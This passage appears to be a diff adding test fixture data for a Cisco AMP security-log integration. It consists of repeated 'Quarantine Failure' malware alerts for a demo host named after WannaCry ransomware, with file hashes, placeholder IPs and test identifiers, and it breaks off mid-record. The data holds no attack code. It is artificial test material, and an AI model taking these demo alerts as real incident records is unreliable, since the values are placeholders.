+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843562131Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526288\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303569945526288",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843564045Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526287\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303569945526287",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843565954Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303569945526286\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303569945526286",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843567900Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558988\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303565650558988",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843569770Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558989\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303565650558989",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843571678Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558987\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303565650558987",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843573820Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558986\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303565650558986",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843575704Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558985\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419303565650558985",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843595495Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303574240494000,\"timestamp\":1610652551,\"timestamp_nanoseconds\":664000000,\"date\":\"2021-01-14T19:29:11+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419303565650558984\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419303574240494000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419303565650558984",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "tasksche.exe",
+                "pid": 2920,
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "@timestamp": "2021-01-14T19:29:11.000Z",
+            "file": {
+                "name": "taskse.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe",
+                "hash": {
+                    "sha256": "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:31:29.843599818Z",
